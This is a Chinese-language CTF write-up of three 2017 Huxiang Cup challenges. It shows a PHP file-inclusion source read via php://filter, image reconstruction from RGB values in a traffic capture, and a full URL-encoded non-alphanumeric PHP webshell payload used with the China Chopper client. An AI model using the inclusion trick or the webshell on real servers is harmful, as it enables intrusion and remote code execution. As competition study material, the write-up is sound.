0x00 前言
作为一名菜鸡,挤出了一点时间来做了做今年的湖湘杯,快结束的时候看了看题目,就做出了三道题,和大家分享下。
0x01 第一题 web200
拿道题目本以为是文件上传,但是试了几个方法没成功,随便点了点,看到了url中op参数,感觉是php文件包含漏洞
试了试,得到了index.php的源码
0x02 使用php://filter 读取源码
在使用php:filter协议获取源码时,需要注意”resource=index”这里不能有后缀,经过查看index源码,确实不需要后缀,后缀在源码进行了拼接。
<?php
error_reporting(0);
define('FROM_INDEX', 1);
$op = empty($_GET['op']) ? 'home' : $_GET['op'];
if(!is_string($op) || preg_match('/\.\./', $op))
die('Try it again and I will kill you! I freaking hate hackers!');
ob_start('ob_gzhandler');
function page_top($op) {
?><!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Panduploader::<?= htmlentities(ucfirst($op)); ?></title>
</head>
<body>
<div id="header">
<center><a href="?op=home" class="logo"><img src="images/logo.jpg" alt=""></a></center>
</div>
<div id="body">
<?php
}
function fatal($msg) {
?><div class="article">
<h2>Error</h2>
<p><?=$msg;?></p>
</div><?php
exit(1);
}
function page_bottom() {
?>
</div>
<center>
<div id="footer">
<div>
<p>
<span>2017 © </span> All rights reserved.
</p>
</div>
</div>
</center>
</body>
</html><?php
ob_end_flush();
}
register_shutdown_function('page_bottom');
page_top($op);
if(!(include $op . '.php'))
fatal('no such page');
?>
0x03 获取flag
url中输入flag.php ,发现有这个文件,直接读取源码,获取flag
http://114.215.129.72:10080/?op=php://filter/read=convert.base64-encode/resource=flag
0x04 第二题 MISC流量分析
查看http流发现有flag.zip
追踪TCP流将flag.zip的hex放入winhex中,保存为flag.zip
解压出一个ce.txt
打开一看,开始以为是二维码,结果做了半天也没弄出来,后来发现是RGB还原出png的图片
cat -n ce.txt | tail -n 1
98457 254, 255, 255可以看到一共有98457行,可以生成一张887x111的图片(一般这样的图片flag为一长串,所以试了试这个规格的图片)
使用脚本生成png图片
#! /usr/bin/python2.7
from PIL import Image
x = 887
y = 111
im = Image.new('RGB',(x,y))
file = open('ce.txt')
for i in range(0,x):
for j in range(0,y):
line = file.readline()
lst = line.split(',')
im.putpixel((i,j),(int(lst[0]),int(lst[1]),int(lst[2])))
im.show()
im.save('flag.png')
0x05 第三题 web300
经过尝试,过滤了字母、数字和一些符号,需要上传一个 webshell
找到p牛的文章,提到了一种利用类型转换的 webshell。
Payload
http://114.215.133.202:10080/?content=$_=%27%27;$_[%2b$_]%2b%2b;$_=$_.%27%27;$__=$_[%2b%27%27];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____=%27_%27;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);
使用菜刀连接 密码为“_”
